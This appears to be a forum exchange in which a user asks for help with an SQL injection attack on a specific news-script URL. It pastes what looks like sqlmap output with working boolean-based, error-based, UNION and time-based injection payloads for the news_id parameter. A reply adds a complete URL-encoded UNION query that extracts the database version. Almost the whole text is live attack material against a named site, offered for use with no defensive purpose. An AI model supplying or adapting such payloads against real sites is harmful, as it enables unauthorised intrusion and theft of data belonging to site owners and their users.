Message from
LelouchMe
I can't figure out how to put the query together correctly here... Help pls...
http://skyscript.ru/primer/skynews/?act=nov&news_id=1
Place: GET
Parameter: news_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: act=nov&news_id=1' AND 9405=9405 AND 'UguU'='UguU
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: act=nov&news_id=1' AND (SELECT 6046 FROM(SELECT COUNT(*),CONCAT(0x3
a776c743a,(SELECT (CASE WHEN (6046=6046) THEN 1 ELSE 0 END)),0x3a6d616a3a,FLOOR(
RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'iazZ'='ia
zZ
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: act=nov&news_id=-7664' UNION ALL SELECT NULL,CONCAT(0x3a776c743a,0x
51754e467746706b6e4d,0x3a6d616a3a),NULL,NULL,NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: act=nov&news_id=1' AND SLEEP(5) AND 'ORSc'='ORSc
like this http://skyscript.ru:80/primer/skynews/?act=nov&news_id=-3603%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280 x3a776c743a%2CIFNULL%28CAST%28version%28%29%20AS%2 0CHAR%29%2C0x20%29%2C0x3a6d616a3a%29%2CNULL%2CNULL %2CNULL%2CNULL%23
just remove the spaces